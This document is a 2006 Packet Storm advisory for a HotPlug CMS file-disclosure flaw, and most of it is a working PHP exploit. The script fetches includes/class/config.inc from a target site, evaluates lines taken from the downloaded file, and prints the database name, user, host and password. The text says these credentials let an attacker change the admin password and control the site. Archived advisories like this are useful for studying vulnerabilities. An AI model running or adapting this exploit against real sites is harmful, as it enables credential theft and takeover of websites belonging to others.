hotplugCMSconfig.txt

2006-09-13T00:00:00
ID PACKETSTORM:49953
Type packetstorm
Reporter HACKERS PAL
Modified 2006-09-13T00:00:00

Description

                                        
                                            `Hello  
  
HotPlug CMS Config File Include Vulnerability  
  
Discovered by : HACKERS PAL  
Copyrights : HACKERS PAL  
Website : WwW.SoQoR.NeT  
Email : security@soqor.net  
  
After Script Url Add  
includes/class/config.inc  
  
And you will download the config file ,, so that you will be able to connect by remote connect program to the mysql server and change admin password and be able to control the website..  
  
And This is the exploit if you want :-  
  
#!/usr/bin/php -q -d short_open_tag=on  
<?  
/*  
/* HotPlug CMS Config File Include Vulnerability exploit  
/* By : HACKERS PAL  
/* WwW.SoQoR.NeT  
*/  
print_r('  
/**********************************************/  
/* HotPlug CMS Config File Include Vul */  
/* by HACKERS PAL <security@soqor.net> */  
/* site: http://www.soqor.net */');  
if ($argc<2) {  
print_r('  
/* -- */  
/* Usage: php '.$argv[0].' host */  
/* Example: */  
/* php '.$argv[0].' http://localhost/hot */  
/**********************************************/  
');  
die;  
}  
error_reporting(0);  
ini_set("max_execution_time",0);  
ini_set("default_socket_timeout",5);  
  
$url=$argv[1];  
$exploit="/includes/class/config.inc";  
$page=$url.$exploit;  
Function get_page($url)  
{  
  
if(function_exists("file_get_contents"))  
{  
  
$contents = file_get_contents($url);  
  
}  
else  
{  
$fp=fopen("$url","r");  
while($line=fread($fp,1024))  
{  
$contents=$contents.$line;  
}  
  
  
}  
return $contents;  
}  
  
$page = get_page($page);  
  
if(eregi("<?php",$page))  
{  
$lines = explode("\n",$page);  
  
$evaled = $lines[50].$lines[51].$lines[52].$lines[53].$lines[54].$lines[55].$lines[56].$lines[58].$lines[58].$lines[59];  
$evaled=str_replace("include","#include",$evaled);  
eval($evaled);  
  
  
Echo "\n[+] Database Name : $db_name";  
Echo "\n[+] Database User : $db_user";  
Echo "\n[+] Database Host : $db_host";  
Echo "\n[+] Database Pass : $db_password";  
Die("\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/");  
}  
else  
{  
Die("\n[-] Exploit Failed\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/");  
  
}  
?>  
  
WwW.SoQoR.NeT  
`